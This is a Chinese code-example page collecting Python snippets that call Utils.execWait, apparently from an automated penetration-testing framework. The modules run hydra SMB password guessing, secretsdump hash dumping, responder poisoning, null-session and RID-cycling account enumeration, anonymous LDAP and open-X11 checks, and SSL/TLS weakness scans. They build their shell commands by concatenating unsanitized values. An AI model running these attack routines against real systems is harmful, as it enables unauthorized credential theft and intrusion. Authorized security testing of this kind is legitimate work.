本文整理汇总了Python中core.utils.Utils.execWait方法的典型用法代码示例。如果您正苦于以下问题:Python Utils.execWait方法的具体用法?Python Utils.execWait怎么用?Python Utils.execWait使用的例子?那么恭喜您, 这里精选的方法代码示例或许可以为您提供帮助。您也可以进一步了解该方法所在类core.utils.Utils的用法示例。
在下文中一共展示了Utils.execWait方法的15个代码示例,这些例子默认根据受欢迎程度排序。您可以为喜欢或者感觉有用的代码点赞,您的评价将有助于系统推荐出更棒的Python代码示例。
示例1: process
# 需要导入模块: from core.utils import Utils [as 别名]
# 或者: from core.utils.Utils import execWait [as 别名]
def process(self):
# load any targets we are interested in
self.getTargets()
callFire = False
# loop over each target
for t in self.targets:
# verify we have not tested this host before
if not self.seentarget(t):
self.display.verbose(self.shortName + " - Connecting to " + t)
# add the new IP to the already seen list
self.addseentarget(t)
# make outfile
outfile = self.config["proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(10)
# run rpcclient
command = "ldapsearch -h " + t + " -p 389 -x -s base"
result = Utils.execWait(command, outfile)
# TODO - Parse output and do stuff
parts = re.findall("ref: .*", result)
for part in parts:
callFire = True
self.addVuln(t, "AnonymousLDAP", {"port": "389", "message": str(part).replace("/", "%2F"), "output": outfile.replace("/", "%2F")})
if callFire:
self.fire("anonymousLDAP")
return示例2: process
# 需要导入模块: from core.utils import Utils [as 别名]
# 或者: from core.utils.Utils import execWait [as 别名]
def process(self):
# load any targets we are interested in
self.getTargets()
# loop over each target
for t in self.targets:
users = self.getUsers(t)
self.display.verbose(self.shortName + " - Connecting to " + t)
for user in users:
# verify we have not tested this host before
if not self.seentarget(t + str(user)):
# add the new IP to the already seen list
self.addseentarget(t + str(user))
# make outfile
temp_file = self.config["proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(10)
command = self.config["hydra"] + " -s 445 -l " + user + " -P " + self.config[
"miscDir"] + "passwords.txt smb://" + t
result = Utils.execWait(command, temp_file, timeout=30)
# Extract usernames & passwords from results and add to KB
parts = re.findall(".* login:\s\s*([^\s]*)\s\s*password:\s\s*([^\s]*)", result)
for part in parts:
self.fire("newSmbPassword")
self.addVuln(t, "guessable password", {"output": temp_file.replace("/", "%2F")})
self.display.debug(
"Identified username [" + part[0] + "] with password [" + part[1] + "] on " + t)
kb.add("creds/host/" + t + "/username/" + part[0].strip() + "/password/" + part[1].strip())
return示例3: process
# 需要导入模块: from core.utils import Utils [as 别名]
# 或者: from core.utils.Utils import execWait [as 别名]
def process(self):
# load any targets we are interested in
self.getTargets()
# loop over each target
for t in self.targets:
users = kb.get(['host/' + t + '/user'])
self.display.verbose(self.shortName + " - Connecting to " + t)
for user in users:
# verify we have not tested this host before
if not self.seentarget(t + str(user)):
# add the new IP to the already seen list
self.addseentarget(t + str(user))
passwords = kb.get(['host/' + t + '/user/' + user + '/password'])
for password in passwords:
self.display.verbose(self.shortName + " - Connecting to " + t)
# make outfile
temp_file = self.config[
"proofsDir"] + self.shortName + "_" + t + "_" + user + "_" + Utils.getRandStr(
10)
# run secretesdump.py
command = "secretsdump.py -outputfile " + temp_file + " \"" + user + "\":\"" + password + \
"\"@" + t
result = Utils.execWait(command, None)
# TODO
# parse out put and store any new info and fire any additional triggers
return示例4: process
# 需要导入模块: from core.utils import Utils [as 别名]
# 或者: from core.utils.Utils import execWait [as 别名]
def process(self):
# load any targets we are interested in
self.getTargets()
# loop over each target
for t in self.targets:
# verify we have not tested this host before
ports = kb.get('service/http/' + t + '/tcp')
for port in ports:
if not self.seentarget(t + str(port)):
self.addseentarget(t+str(port))
outfile = self.config["proofsDir"] + self.shortName + "_" + t + "_" + str(port) + "_" + Utils.getRandStr(10) + ".txt"
command = "python " + self.config["jexboss"] + " -mode file-scan -out " + outfile + " -file <(echo \"http://" + t + ":" + str(port) + "\")"
result = Utils.execWait(command)
kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F" ))
contents = []
with open (outfile, "r") as myfile:
contents = myfile.readlines()
for line in contents:
m = re.match(r'^.*VULNERABLE TO (.*)\].*', line)
if (m):
vuln = m.group(1).strip()
self.addVuln(t, self.shortName + "-" + vuln, {"port": port, "output": outfile.replace("/", "%2F")})
ports = kb.get('service/https/' + t + '/tcp')
for port in ports:
if not self.seentarget(t + str(port)):
self.addseentarget(t+str(port))
outfile = self.config["proofsDir"] + self.shortName + "_" + t + "_" + str(port) + "_" + Utils.getRandStr(10) + ".txt"
command = "python " + self.config["jexboss"] + " -mode file-scan -out " + outfile + " -file <(echo \"https://" + t + ":" + str(port) + "\")"
result = Utils.execWait(command)
kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F" ))
contents = []
with open (outfile, "r") as myfile:
contents = myfile.readlines()
for line in contents:
m = re.match(r'^.*VULNERABLE TO (.*)\].*', line)
if (m):
vuln = m.group(1).strip()
self.addVuln(t, self.shortName + "-" + vuln, {"port": port, "output": outfile.replace("/", "%2F")})
return示例5: process
# 需要导入模块: from core.utils import Utils [as 别名]
# 或者: from core.utils.Utils import execWait [as 别名]
def process(self):
# load any targets we are interested in
self.getTargets()
# loop over each target
for t in self.targets:
# verify we have not tested this host before
if not self.seentarget(t):
# add the new IP to the already seen list
self.addseentarget(t)
self.display.verbose(self.shortName + " - Connecting to " + t)
# get windows domain/workgroup
temp_file2 = self.config["proofsDir"] + "nmblookup_" + t + "_" + Utils.getRandStr(10)
command2 = self.config["nmblookup"] + " -A " + t
result2 = Utils.execWait(command2, temp_file2)
workgroup = "WORKGROUP"
for line in result2.split('\n'):
m = re.match(r'\s+(.*)\s+<00> - <GROUP>.*', line)
if (m):
workgroup = m.group(1).strip()
self.display.debug("found ip [%s] is on the workgroup/domain [%s]" % (t, workgroup))
# make outfile
outfile = self.config["proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(10)
# run rpcclient
command = self.config["rpcclient"] + " -N -U \"\" -W " + workgroup + " " + t + " -c srvinfo"
result = Utils.execWait(command, outfile)
# check to see if it worked
if any(x in result for x in ["NT_STATUS_LOGON_FAILURE", "NT_STATUS_ACCESS_DENIED"]):
# do nothing
self.display.verbose("Could not get NULL Session on %s" % t)
else:
# fire a new trigger
self.fire("nullSession")
self.addVuln(t, "nullSession", {"type": "rpc", "output": outfile.replace("/", "%2F")})
self.display.error("VULN [NULLSession] Found on [%s]" % t)
# TODO - process rpcclient srvinfo results
# parse out put and store any new info and fire any additional triggers
return示例6: run
# 需要导入模块: from core.utils import Utils [as 别名]
# 或者: from core.utils.Utils import execWait [as 别名]
def run(self, target="127.0.0.1", ports="1-1024", flags="-sS", vector="", filetag=""):
# get tmp file
proofsDir = ""
if "proofsDir" in self.config.keys():
proofsDir = self.config["proofsDir"]
self.outfile = proofsDir + "NMAP-" + filetag + "-" + Utils.getRandStr(10)
command = "nmap " + flags + " -p " + ports + " -oA " + self.outfile + " " + target
tmp_results = Utils.execWait(command)
self.display.output("Scan file saved to [%s]" % self.outfile)
return self.loadXMLFile(self.outfile + ".xml", "nmapFile")示例7: process
# 需要导入模块: from core.utils import Utils [as 别名]
# 或者: from core.utils.Utils import execWait [as 别名]
def process(self):
temp_file = self.config["proofsDir"] + self.shortName + "_" + Utils.getRandStr(10)
command = "responder -I eth0 -wrf"
# run for 15 minutes
# result = Utils.execWait(command, temp_file, timeout=900)
result = Utils.execWait(command, temp_file, timeout=60)
# TODO
# check to see if we got any creds
# if not, wait 5 minutes and run again for 15 minutes
# repeat upto 5 4 times
return示例8: process
# 需要导入模块: from core.utils import Utils [as 别名]
# 或者: from core.utils.Utils import execWait [as 别名]
def process(self):
# load any targets we are interested in
self.getTargets()
# loop over each target
for t in self.targets:
users = self.getUsers(t)
self.display.verbose(self.shortName + " - Connecting to " + t)
for user in users:
# verify we have not tested this host before
if not self.seentarget(t + str(user)):
# add the new IP to the already seen list
self.addseentarget(t + str(user))
passwords = kb.get(['creds/host/' + t + '/username/' + user + '/password'])
for password in passwords:
self.display.verbose(self.shortName + " - Connecting to " + t)
# make outfile
temp_file = self.config[
"proofsDir"] + self.shortName + "_" + t + "_" + user + "_" + Utils.getRandStr(
10)
# run secretesdump.py
command = self.config["secretsdump.py"] + " -outputfile " + temp_file + " \"" + user + "\":\"" + password + \
"\"@" + t
result = Utils.execWait(command, None)
if Utils.isReadable(temp_file + '.sam'):
with open (temp_file + '.sam', "r") as myfile:
result=myfile.readlines()
for line in result:
m = line.split(':')
user = m[0].strip()
uid = m[1].strip()
lmhash = m[2].strip()
ntlmhash = m[3].strip()
kb.add("creds/host/" + t + "/username/" + user + "/lmhash/" + lmhash)
kb.add("creds/host/" + t + "/username/" + user + "/ntlmhash/" + ntlmhash)
kb.add("creds/host/" + t + "/username/" + user + "/fullhash/" + lmhash + ":" + ntlmhash)
self.fire("newNTLMHash")
return示例9: process
# 需要导入模块: from core.utils import Utils [as 别名]
# 或者: from core.utils.Utils import execWait [as 别名]
def process(self):
# load any targets we are interested in
self.getTargets()
if len(self.targets) > 0:
# loop over each target
for t in self.targets:
if not self.seentarget(t):
# add the new IP to the already seen list
self.addseentarget(t)
cstrings = kb.get("vuln/host/" + t + "/snmpCred/communityString")
for community in cstrings:
command = self.config["snmpwalk"] + " -v 2c -c " + community + " " + t
result = command + "\n" + Utils.execWait(command) #append command to top of output
outfile = self.config["proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(10)
Utils.writeFile(result, outfile)
kb.add("host/" + t + "/vuln/snmpCred/output/" + outfile.replace("/", "%2F"))
return示例10: process
# 需要导入模块: from core.utils import Utils [as 别名]
# 或者: from core.utils.Utils import execWait [as 别名]
def process(self):
# load any targets we are interested in
self.getTargets()
# loop over each target
for t in self.targets:
# verify we have not tested this host before
if not self.seentarget(t):
self.display.verbose(self.shortName + " - Connecting to " + t)
# add the new IP to the already seen list
self.addseentarget(t)
# make outfile
temp_file = self.config["proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(10)
# run rpcclient
command = "ldapsearch -h " + t + " -p 389 -x -s base"
result = Utils.execWait(command, temp_file)
# TODO - Parse output and do stuff
return示例11: sids2names
# 需要导入模块: from core.utils import Utils [as 别名]
# 或者: from core.utils.Utils import execWait [as 别名]
def sids2names(self, ip, sid, start, stop):
rid_accounts = []
ranges = ['%s-%s' % (sid, rid) for rid in range(start, stop)]
chunk_size = 2500
chunks = list(self.chunk(ranges, chunk_size))
for c in chunks:
command = 'rpcclient -U "" %s -N -c "lookupsids ' % ip
command += ' '.join(c)
command += '"'
result = Utils.execWait(command, None)
if "NT_STATUS_ACCESS_DENIED" in result:
break
for line in result.rstrip().split('\n'):
if not "*unknown*" in line:
if line != "":
rid_account = line.split(" ", 1)[1]
if rid_account != "request" and '00000' not in rid_account and '(1)' in rid_account:
rid_account = rid_account.replace("(1)", "")
rid_account = rid_account.rstrip()
rid_accounts.append(rid_account)
return rid_accounts示例12: process
# 需要导入模块: from core.utils import Utils [as 别名]
# 或者: from core.utils.Utils import execWait [as 别名]
def process(self):
# load any targets we are interested in
self.getTargets()
if len(self.targets) > 0:
# loop over each target
for t in self.targets:
if not self.seentarget(t):
# add the new IP to the already seen list
self.addseentarget(t)
command = "xwd -root -screen -silent -display " + t + ":0"
result = Utils.execWait(command)
if "unable to open display" not in result:
outfile = self.config["proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(10) + ".png"
command = "xwd -root -screen -silent -display " + t + ":0 | convert - " + outfile
self.addVuln(t, "openX11",
{"port": "6000", "output": outfile.replace("/", "%2F")})
self.fire("x11Access")
return示例13: process
# 需要导入模块: from core.utils import Utils [as 别名]
# 或者: from core.utils.Utils import execWait [as 别名]
def process(self):
# load any targets we are interested in
self.getTargets()
# loop over each target
for t in self.targets:
ports = kb.get(['service/https/host/' + t + '/tcpport', 'service/ssl/host/' + t + '/tcpport'])
for port in ports:
# verify we have not tested this host before
if not self.seentarget(t + str(port)):
# add the new IP to the already seen list
self.addseentarget(t + str(port))
# make outfile
temp_file = self.config["proofsDir"] + self.shortName + "_" + t + "_" + str(
port) + "_" + Utils.getRandStr(10)
command = "java -jar " + self.config["miscDir"] + "TestSSLServer.jar " + t + " " + port
result = Utils.execWait(command, temp_file, timeout=30)
# TODO - parse output and store results?
# print result
return示例14: process
# 需要导入模块: from core.utils import Utils [as 别名]
# 或者: from core.utils.Utils import execWait [as 别名]
def process(self):
# load any targets we are interested in
self.getTargets()
# loop over each target
for t in self.targets:
ports = kb.get('service/https/' + t + '/tcp', 'service/ssl/' + t + '/tcp')
for port in ports:
# verify we have not tested this host before
if not self.seentarget(t + str(port)):
# add the new IP to the already seen list
self.addseentarget(t + str(port))
# make outfile
temp_file = self.config["proofsDir"] + self.shortName + "_" + t + "_" + str(
port) + "_" + Utils.getRandStr(10)
command = self.config["sslscan"] + " --no-color " + t + ":" + port
result = Utils.execWait(command, temp_file, timeout=60)
depricatedlist = []
weakciphers = []
keystrength = ""
with open (temp_file, "r") as myfile:
result=myfile.readlines()
for line in result:
m = re.match(r'^\s*Accepted\s\s+([^ ]*)\s\s*(\d\d*)\s\s*bits\s*([^ ]*)', line)
if (m):
protocol = m.group(1).strip()
bit = m.group(2).strip()
cipher = m.group(3).strip()
if (protocol == "SSLv2"):
if protocol not in depricatedlist:
depricatedlist.append(protocol)
elif (protocol == "SSLv3"):
if protocol not in depricatedlist:
depricatedlist.append(protocol)
elif (protocol == "TLSv1.0"):
if protocol not in depricatedlist:
depricatedlist.append(protocol)
elif (protocol == "TLSv1.1"):
if protocol not in depricatedlist:
depricatedlist.append(protocol)
elif (protocol == "TLSv1.2"):
if "DES" in cipher:
if cipher not in weakciphers:
weakciphers.append(cipher)
elif "RSA" in cipher:
if cipher not in weakciphers:
weakciphers.append(cipher)
elif "NULL" in cipher:
if cipher not in weakciphers:
weakciphers.append(cipher)
elif int(bit) < 112:
if cipher not in weakciphers:
weakciphers.append(cipher)
else:
m = re.match(r'^\s*RSA Key Strength:\s*(\d\d*)', line)
if (m):
if int(m.group(1).strip()) < 2048:
keystrength = m.group(1).strip()
# store data into KB
for depricatedProto in depricatedlist:
kb.add('service/https/' + t + '/tcp/' + port + '/depricatedSSLProto/' + depricatedProto)
for weakCipher in weakciphers:
kb.add('service/https/' + t + '/tcp/' + port + '/weakSSLCipher/' + weakCipher)
if keystrength is not "":
kb.add('service/https/' + t + '/tcp/' + port + '/weakSSLKeyStrength/' + keystrength)
# improve the output
self.display.debug(t + "," + str(port) + "," + ' '.join(depricatedlist) + "," + ' '.join(
weakciphers) + "," + keystrength)
return示例15: process
# 需要导入模块: from core.utils import Utils [as 别名]
# 或者: from core.utils.Utils import execWait [as 别名]
def process(self):
# load any targets we are interested in
self.getTargets()
# loop over each target
for t in self.targets:
ports = kb.get('service/https/' + t + '/tcp', 'service/ssl/' + t + '/tcp')
for port in ports:
# verify we have not tested this host before
if not self.seentarget(t + str(port)):
# add the new IP to the already seen list
self.addseentarget(t + str(port))
# make outfile
temp_file = self.config["proofsDir"] + self.shortName + "_" + t + "_" + str(
port) + "_" + Utils.getRandStr(10)
command = self.config["java"] + " -jar " + self.config["miscDir"] + "TestSSLServer.jar " + t + " " + port
result = Utils.execWait(command, temp_file, timeout=30)
depricatedlist = []
weakciphers = []
keystrength = ""
tls12 = False
with open (temp_file, "r") as myfile:
result=myfile.readlines()
for line in result:
if (tls12):
m = re.match(r'^ (.*)', line)
if (m):
cipher = line.strip()
if "DES" in cipher:
if cipher not in weakciphers:
weakciphers.append(cipher)
elif "RSA" in cipher:
if cipher not in weakciphers:
weakciphers.append(cipher)
elif "NULL" in cipher:
if cipher not in weakciphers:
weakciphers.append(cipher)
else:
tls12 = False
else:
m = re.match(r'^\s*Supported versions: (.*)', line)
if (m):
if ("SSLv2" in m.group(1)):
protocol = "SSLv2"
if protocol not in depricatedlist:
depricatedlist.append(protocol)
elif ("SSLv3" in m.group(1)):
protocol = "SSLv3"
if protocol not in depricatedlist:
depricatedlist.append(protocol)
elif ("TLSv1.0" in m.group(1)):
protocol = "TLSv1.0"
if protocol not in depricatedlist:
depricatedlist.append(protocol)
elif ("TLSv1.1" in m.group(1)):
protocol = "TLSv1.1"
if protocol not in depricatedlist:
depricatedlist.append(protocol)
m = re.match(r'^ TLSv1.2\s*', line)
if (m):
tls12 = True
# store data into KB
for depricatedProto in depricatedlist:
kb.add('service/https/' + t + '/tcp/' + port + '/depricatedSSLProto/' + depricatedProto)
for weakCipher in weakciphers:
kb.add('service/https/' + t + '/tcp/' + port + '/weakSSLCipher/' + weakCipher)
if keystrength is not "":
kb.add('service/https/' + t + '/tcp/' + port + '/weakSSLKeyStrength/' + keystrength)
return